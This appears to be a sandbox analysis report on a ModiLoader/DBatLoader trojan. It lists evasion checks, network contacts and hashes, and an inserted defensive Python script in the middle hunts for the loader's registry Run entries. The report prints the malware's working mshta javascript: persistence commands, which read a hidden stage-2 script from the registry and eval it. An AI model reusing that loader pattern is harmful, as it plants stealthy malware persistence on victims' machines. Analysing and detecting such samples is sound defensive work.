Malware Analysis Report

2024-10-23 19:35

Sample ID 240506-mjsjfaha9t
Target 1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118
SHA256 1dd0bf89c416a276deb5bba33d65a8a0c5a5653e4f9d3178d6745313b1416f81
Tags modiloader evasion persistence trojan
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10
SHA256 1dd0bf89c416a276deb5bba33d65a8a0c5a5653e4f9d3178d6745313b1416f81

Threat Level: Known bad

The file 1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Checks for common network interception software

Looks for VirtualBox Guest Additions in registry

ModiLoader Second Stage

Looks for VMWare Tools registry key

Adds policy Run key to start application

Deletes itself

Checks BIOS information in registry

Adds Run key to start application

Maps connected drives based on registry

Unsigned PE

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-05-06 10:30

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-05-06 10:30
Reported 2024-05-06 10:32
Platform win7-20240221-en
Max time kernel 150s
Max time network 150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\dllhost.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A (48 identical rows; the sandbox recorded no indicator detail for this signature)

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\dllhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:mNmw6jW=\"Jwbps\";BH93=new%20ActiveXObject(\"WScript.Shell\");kwhqlnH1v=\"hMUG\";Z5t4hU=BH93.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\c41a571d\\\\a7204798\");YZFO5oo=\"daxo\";eval(Z5t4hU);oKkiA7m8F=\"LGi0QA\";" C:\Windows\SysWOW64\dllhost.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\dllhost.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\dllhost.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:tDEJbU0HS=\"zthRm4\";Kc5=new%20ActiveXObject(\"WScript.Shell\");NpoXb2Z=\"dRQm\";KX3i2f=Kc5.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\c41a571d\\\\a7204798\");RV7JqR5StF=\"MTZYHO\";eval(KX3i2f);LP5dDeh4=\"o\";" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:eWw29pof=\"DdpF\";ul4=new%20ActiveXObject(\"WScript.Shell\");G7fGbeU1X=\"LC4sVLIqkG\";Uz8mz=ul4.RegRead(\"HKCU\\\\software\\\\c41a571d\\\\a7204798\");QLFP7IP=\"K7huPQY\";eval(Uz8mz);fMEyq17XV=\"f\";" C:\Windows\SysWOW64\dllhost.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\dllhost.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\dllhost.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\dllhost.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A (63 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1972 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe C:\Windows\SysWOW64\dllhost.exe (4 identical rows)
PID 2812 wrote to memory of 2532 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe (4 identical rows)
PID 2532 wrote to memory of 2472 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe (4 identical rows)
PID 2532 wrote to memory of 2292 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\explorer.exe (4 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe"

C:\Windows\SysWOW64\dllhost.exe

dllhost.exe

C:\Windows\SysWOW64\dllhost.exe

dllhost.exe

C:\Windows\SysWOW64\dllhost.exe

"C:\Windows\SysWOW64\dllhost.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

Network

Country Destination Domain Proto
CA 173.238.91.163:80 tcp
BR 128.251.82.137:80 tcp
US 76.51.61.120:80 tcp
US 146.143.33.144:443 tcp
US 8.8.8.8:53 microsoft.com udp
US 20.112.250.133:80 microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
BE 2.21.17.194:443 www.microsoft.com tcp
AU 1.135.49.165:80 tcp
MY 147.158.6.42:8080 tcp
CN 114.80.73.57:80 tcp
GB 25.212.143.178:8080 tcp
US 150.247.189.195:80 tcp
GB 25.155.245.218:80 tcp
US 134.138.212.158:80 tcp
US 97.99.222.228:80 tcp
BR 135.243.215.40:80 tcp
IT 185.14.76.108:80 tcp
US 68.118.120.17:80 tcp
US 70.42.62.125:80 tcp
US 34.102.102.68:8080 tcp
US 167.212.139.227:80 tcp
CN 117.155.195.226:80 tcp
CN 114.234.215.66:80 tcp
TW 203.66.143.178:80 tcp
US 28.26.42.201:80 tcp
US 104.72.127.179:80 tcp
GB 151.180.238.227:80 tcp
US 9.25.64.216:8080 tcp
US 143.20.74.133:80 tcp
US 30.67.59.60:80 tcp
US 165.111.248.150:8080 tcp
JP 150.11.205.172:80 tcp
US 6.176.247.210:80 tcp
SE 81.234.79.44:80 tcp
US 73.131.249.245:8080 tcp
GB 93.174.148.156:443 tcp
US 173.113.246.14:80 tcp
KR 222.113.245.73:80 tcp
IT 87.10.150.19:80 tcp
US 69.172.4.102:80 tcp
CN 120.213.64.220:80 tcp
AT 128.130.108.48:80 tcp
US 3.210.46.43:80 tcp
ES 81.40.214.205:80 tcp
N/A 127.203.121.182:80 tcp
IT 37.181.143.20:80 tcp
IR 95.162.110.191:80 tcp
US 167.6.55.155:80 tcp
GB 81.99.190.174:80 tcp
US 18.20.26.218:8080 tcp
SG 43.165.80.205:80 tcp
ES 77.224.12.154:80 tcp
US 11.81.198.228:80 tcp
CN 122.247.236.22:80 tcp
N/A 127.82.129.50:8080 tcp
AT 148.198.79.226:80 tcp
US 69.112.108.252:80 tcp
IN 223.182.40.78:80 tcp
US 165.124.48.195:80 tcp
CZ 78.156.158.216:80 tcp
KR 180.66.186.85:80 tcp
CN 183.131.66.66:80 tcp
MX 148.232.41.166:80 tcp
N/A 137.35.216.43:80 tcp
IT 109.114.255.236:80 tcp
DE 77.178.247.1:80 tcp
TW 223.138.205.17:8080 tcp
US 199.154.123.165:80 tcp
BR 54.94.249.83:80 tcp
TR 178.245.248.74:80 tcp
US 68.53.17.154:80 tcp
US 97.245.12.135:80 tcp
KR 210.108.46.194:80 tcp
ID 39.211.121.60:80 tcp
RO 85.123.142.172:80 tcp
CN 180.96.61.95:80 tcp
US 66.3.19.114:80 tcp
NL 145.164.119.200:443 tcp
US 19.255.177.157:80 tcp
JP 124.35.187.166:80 tcp
FR 90.56.119.198:80 tcp
US 174.163.95.20:80 tcp
JP 220.5.152.212:8080 tcp
GB 62.253.45.253:80 tcp
US 9.152.42.149:80 tcp
JP 153.149.157.214:80 tcp
US 43.219.227.49:80 tcp
US 155.37.223.91:8080 tcp
US 140.30.105.102:80 tcp
AR 186.136.92.226:80 tcp
US 100.29.220.148:80 tcp
IT 82.50.107.11:80 tcp
US 16.244.33.46:80 tcp
US 6.7.144.119:80 tcp
US 174.215.56.196:80 tcp
CN 180.187.6.69:80 tcp
US 73.213.44.235:80 tcp
HR 93.136.223.166:80 tcp
US 138.179.27.154:80 tcp
FI 178.213.239.206:80 tcp
CN 171.113.136.74:8080 tcp
US 130.169.56.95:80 tcp
DK 87.62.103.78:80 tcp
PT 95.136.102.55:80 tcp
RU 77.238.255.116:80 tcp
NL 74.234.224.105:80 tcp
AT 46.75.237.185:80 tcp
US 34.7.69.68:80 tcp
CN 182.140.144.147:80 tcp
US 47.181.82.194:80 tcp
CN 110.59.17.194:80 tcp
CA 142.238.58.247:80 tcp
GB 31.3.225.196:80 tcp
CN 113.111.174.137:80 tcp
CN 103.60.165.127:80 tcp
CN 220.187.216.58:80 tcp
DK 152.73.166.209:80 tcp
US 13.136.231.110:80 tcp
US 198.17.238.238:8080 tcp
US 143.151.153.177:80 tcp
DE 63.191.233.162:80 tcp
GB 213.1.113.112:80 tcp
US 22.67.33.44:8080 tcp
CH 94.100.157.182:80 tcp
US 69.142.71.48:80 tcp
US 72.24.182.18:80 tcp
CN 111.3.182.44:80 tcp
BR 135.221.243.220:443 tcp
BR 201.48.158.119:80 tcp
US 65.60.104.67:80 tcp
US 209.232.226.175:80 tcp
US 173.7.171.94:80 tcp
EG 196.141.29.49:80 tcp
N/A 127.199.113.73:80 tcp
JP 124.154.152.82:80 tcp
US 144.152.168.2:443 tcp
IN 122.176.202.221:80 tcp
US 166.155.240.227:80 tcp
ES 95.61.36.8:80 tcp
JP 133.80.191.125:80 tcp
KE 197.137.253.108:80 tcp
US 160.130.218.82:80 tcp
RU 213.142.60.194:80 tcp
US 155.51.82.212:80 tcp
IN 223.237.182.169:80 tcp
US 23.30.145.115:80 tcp
PH 119.94.44.9:443 tcp
JP 211.129.27.240:8080 tcp
RO 185.89.242.88:80 tcp
CN 120.45.62.149:80 tcp
KE 105.59.125.233:80 tcp
FR 109.6.101.63:80 tcp
PK 39.43.172.109:8080 tcp
KR 42.28.199.204:80 tcp
US 156.26.92.241:80 tcp
CA 64.231.216.185:443 tcp
US 21.152.210.106:80 tcp
JP 13.230.197.139:80 tcp
N/A 100.79.44.16:80 tcp
US 208.243.9.95:80 tcp
KR 220.76.119.190:80 tcp
FR 92.182.123.123:80 tcp
KR 106.245.97.246:8080 tcp
DE 51.189.146.194:80 tcp
KR 112.169.78.184:80 tcp
US 3.190.36.126:80 tcp
US 173.146.247.132:443 tcp
VE 190.76.130.123:80 tcp
JP 153.139.37.119:80 tcp
US 163.243.243.140:80 tcp
US 16.130.23.11:80 tcp
US 48.62.121.111:443 tcp
US 44.236.123.110:443 tcp
NL 144.43.168.203:80 tcp
IE 86.43.84.136:80 tcp
US 173.56.167.148:80 tcp
US 141.128.83.211:80 tcp
CA 155.10.207.171:80 tcp
DE 167.172.172.213:80 tcp
GB 25.23.107.109:443 tcp
US 136.87.8.140:80 tcp
US 204.139.53.28:80 tcp
NL 195.212.239.119:80 tcp
US 198.194.146.246:80 tcp
US 107.194.76.21:80 tcp
PL 81.168.190.4:80 tcp
US 143.226.220.144:80 tcp
US 207.118.90.24:80 tcp
US 159.71.32.136:80 tcp
CO 199.33.68.102:8080 tcp
US 15.40.76.170:80 tcp
CH 57.33.186.24:80 tcp
US 173.10.40.63:80 tcp
US 66.172.202.185:8080 tcp
US 55.199.202.63:80 tcp
NL 46.226.89.90:80 tcp
HK 20.255.112.67:80 tcp
CR 201.199.161.255:80 tcp
HK 20.255.112.67:80 20.255.112.67 tcp
IR 85.185.169.125:80 tcp
IT 79.5.17.82:80 tcp
IN 220.226.158.201:80 tcp
US 56.154.116.127:80 tcp
US 199.227.55.159:80 tcp
IN 147.139.116.195:80 tcp
US 47.47.235.91:80 tcp
CN 182.90.100.15:80 tcp
DE 217.82.179.37:80 tcp
KR 123.44.205.31:80 tcp
CN 123.188.118.43:80 tcp
US 184.36.116.146:443 tcp
US 8.23.103.233:80 tcp
GB 194.61.208.208:80 tcp
CA 99.208.64.9:80 tcp
US 34.139.148.153:8080 tcp
PL 212.76.46.184:80 tcp
US 75.207.39.53:80 tcp
CN 121.237.57.100:80 tcp
US 16.167.85.91:80 tcp
US 207.251.227.84:80 tcp
US 148.163.127.52:80 tcp
FR 91.171.102.34:80 tcp
RS 194.169.167.44:80 tcp
US 75.70.33.192:8080 tcp
US 166.172.73.123:80 tcp
AR 181.165.146.228:80 tcp
US 131.191.77.158:8080 tcp
US 29.242.43.165:8080 tcp
US 73.180.98.177:443 tcp
BR 179.168.126.141:80 tcp
N/A 10.41.192.229:80 tcp
DE 88.79.192.82:80 tcp

Files

memory/1972-0-0x00000000025B0000-0x0000000002C01000-memory.dmp

memory/1972-1-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1972-2-0x0000000000400000-0x0000000000491000-memory.dmp

memory/1972-4-0x0000000000050000-0x0000000000114000-memory.dmp

memory/2812-8-0x0000000000600000-0x0000000000605000-memory.dmp

memory/2812-10-0x00000000000B0000-0x0000000000174000-memory.dmp

memory/1972-9-0x00000000025B0000-0x0000000002C01000-memory.dmp

memory/1972-7-0x0000000000400000-0x0000000000491000-memory.dmp

memory/1972-6-0x0000000000050000-0x0000000000114000-memory.dmp

memory/2532-14-0x0000000000600000-0x0000000000605000-memory.dmp

memory/2812-12-0x00000000000B0000-0x0000000000174000-memory.dmp

memory/2532-17-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-20-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-19-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-18-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-16-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-15-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-22-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-21-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-23-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-24-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-25-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2472-26-0x0000000000600000-0x0000000000605000-memory.dmp

memory/2472-27-0x0000000000120000-0x00000000001E4000-memory.dmp

memory/2472-32-0x0000000000120000-0x00000000001E4000-memory.dmp

memory/2472-30-0x0000000000120000-0x00000000001E4000-memory.dmp

memory/2472-29-0x0000000000120000-0x00000000001E4000-memory.dmp

memory/2472-28-0x0000000000120000-0x00000000001E4000-memory.dmp

memory/2532-41-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-39-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-38-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-37-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-36-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-34-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-33-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-40-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-35-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2292-42-0x00000000007C0000-0x0000000000A41000-memory.dmp

memory/2292-43-0x00000000000C0000-0x0000000000184000-memory.dmp

memory/2292-47-0x00000000000C0000-0x0000000000184000-memory.dmp

memory/2292-46-0x00000000000C0000-0x0000000000184000-memory.dmp

memory/2292-45-0x00000000000C0000-0x0000000000184000-memory.dmp

memory/2292-44-0x00000000000C0000-0x0000000000184000-memory.dmp

memory/2292-49-0x00000000000C0000-0x0000000000184000-memory.dmp

memory/2532-63-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-64-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-62-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-61-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-60-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-59-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-58-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-66-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-65-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-74-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-75-0x0000000000070000-0x0000000000134000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab98BB.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar991B.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Analysis: behavioral2

Detonation Overview

Submitted 2024-05-06 10:30
Reported 2024-05-06 10:32
Platform win10v2004-20240226-en
Max time kernel 151s
Max time network 155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\dllhost.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A (48 identical rows; the sandbox recorded no indicator detail for this signature)

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\dllhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:zI72QEMJ=\"mEn\";t6y=new%20ActiveXObject(\"WScript.Shell\");l7dV0Rbj=\"3dVEoq7\";My2vD=t6y.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\1f2fa368\\\\2bef0163\");MMnycq7LV=\"sfg9P0f\";eval(My2vD);Xtp0SA3h=\"e\";" C:\Windows\SysWOW64\dllhost.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\dllhost.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\dllhost.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:ZxLmo4T5D=\"q8\";K06L=new%20ActiveXObject(\"WScript.Shell\");F3Eh2VQWm=\"3Ew7\";T4e4vE=K06L.RegRead(\"HKCU\\\\software\\\\1f2fa368\\\\2bef0163\");dJYrYqT1=\"wXOGUOlz\";eval(T4e4vE);PbeN6zw6vy=\"vzS8\";" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:BmzO8j2S=\"a\";mH56=new%20ActiveXObject(\"WScript.Shell\");bD71zWznMU=\"p0KTAfGS\";p8RgK=mH56.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\1f2fa368\\\\2bef0163\");du8ag1Xm=\"jl\";eval(p8RgK);pbajT0bUV=\"k\";" C:\Windows\SysWOW64\dllhost.exe N/A
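
The Run entries recorded in behavioral1 and behavioral2 above share one loader pattern: mshta.exe is handed a javascript: URL that creates WScript.Shell, RegRead()s a value from an attacker-created key (c41a571d\a7204798 in the Win7 run, 1f2fa368\2bef0163 in the Win10 run) and eval()s whatever it read. The persisted command line therefore contains no payload; the second stage lives in that registry value, and the key names differ between runs, so hunting has to key on the pattern rather than on the names. The Python below is an added example, not part of the report or of the sandbox's own tooling, that parses a Run value of this shape, extracts the RegRead target and normalizes it to hive, key and value name so the stage-2 script can be exported before the Run value is removed. The sample inputs are the two behavioral1 values copied from the report with one level of report escaping removed, plus a constructed benign entry; the Run-key paths and the updater.exe entry are assumptions.

```python
import re
from urllib.parse import unquote

# Hive aliases that WScript.Shell.RegRead accepts; the loader in this report uses HKLM and HKCU.
HIVES = {
    "HKLM": "HKEY_LOCAL_MACHINE", "HKEY_LOCAL_MACHINE": "HKEY_LOCAL_MACHINE",
    "HKCU": "HKEY_CURRENT_USER",  "HKEY_CURRENT_USER": "HKEY_CURRENT_USER",
    "HKCR": "HKEY_CLASSES_ROOT",  "HKEY_CLASSES_ROOT": "HKEY_CLASSES_ROOT",
    "HKU": "HKEY_USERS",          "HKEY_USERS": "HKEY_USERS",
}

# mshta (bare or with a path) whose only argument is a javascript: URL.
MSHTA_JS_RE = re.compile(r'^"?(?:[^"\s]*\\)?mshta(?:\.exe)?"?\s+javascript:', re.IGNORECASE)
# The string literal handed to RegRead(); the body may contain backslash escapes.
REGREAD_RE = re.compile(r'\.RegRead\(\s*"((?:[^"\\]|\\.)*)"\s*\)')
EVAL_RE = re.compile(r'\beval\s*\(')


def js_unescape(literal):
    """Undo JavaScript string escapes (a doubled backslash becomes one, an escaped quote a quote)."""
    return re.sub(r'\\(.)', r'\1', literal)


def split_reg_path(path):
    """Split a RegRead path into (hive, key, value_name).
    RegRead returns a value; a trailing backslash means the key's default value."""
    alias, _, rest = path.partition("\\")
    hive = HIVES.get(alias.upper())
    if hive is None or not rest:
        return None
    if rest.endswith("\\"):
        return hive, rest.rstrip("\\"), ""
    key, _, value_name = rest.rpartition("\\")
    return hive, key, value_name


def analyze_run_value(data):
    """Classify one Run-key data string and return the RegRead targets,
    which is where the second-stage script is stored."""
    decoded = unquote(data.strip())  # javascript: URLs are percent-encoded (new%20ActiveXObject)
    is_mshta_js = MSHTA_JS_RE.match(decoded) is not None
    reads = [js_unescape(m) for m in REGREAD_RE.findall(decoded)]
    targets = [t for t in map(split_reg_path, reads) if t]
    has_eval = EVAL_RE.search(decoded) is not None
    return {
        "is_mshta_js": is_mshta_js,
        "has_eval": has_eval,
        "regread_paths": reads,
        "targets": targets,
        # Flag only the full chain: mshta + javascript: + RegRead + eval of what was read.
        "flag": is_mshta_js and has_eval and bool(targets),
    }


def hunt(run_entries):
    """run_entries: (run_key, value_name, data) triples dumped from the Run locations
    named in the report. Returns the flagged ones with the registry value to export."""
    hits = []
    for run_key, value_name, data in run_entries:
        result = analyze_run_value(data)
        if result["flag"]:
            hits.append({"run_key": run_key, "value_name": value_name, "stage2": result["targets"]})
    return hits


# Constructed input: two data strings copied from the report's behavioral1 Run entries
# (one level of report escaping removed) plus one made-up benign entry.
SAMPLE_ENTRIES = [
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", "",
     r'mshta javascript:mNmw6jW="Jwbps";BH93=new%20ActiveXObject("WScript.Shell");kwhqlnH1v="hMUG";'
     r'Z5t4hU=BH93.RegRead("HKLM\\software\\Wow6432Node\\c41a571d\\a7204798");YZFO5oo="daxo";'
     r'eval(Z5t4hU);oKkiA7m8F="LGi0QA";'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "",
     r'mshta javascript:eWw29pof="DdpF";ul4=new%20ActiveXObject("WScript.Shell");G7fGbeU1X="LC4sVLIqkG";'
     r'Uz8mz=ul4.RegRead("HKCU\\software\\c41a571d\\a7204798");QLFP7IP="K7huPQY";eval(Uz8mz);fMEyq17XV="f";'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "ExampleUpdater",  # constructed benign entry
     r'"C:\Program Files\Example\updater.exe" /background'),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_ENTRIES):
        print(hit)
```

On a live host, feed hunt() the values of HKLM\...\CurrentVersion\Run, HKLM\...\Policies\Explorer\Run and HKCU\...\CurrentVersion\Run (plus the Wow6432Node view of the machine keys, which is where this sample wrote). The stage2 path it returns is what to export and inspect; deleting only the Run value removes the trigger but leaves the stored script in place.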

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\SysWOW64\dllhost.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\dllhost.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
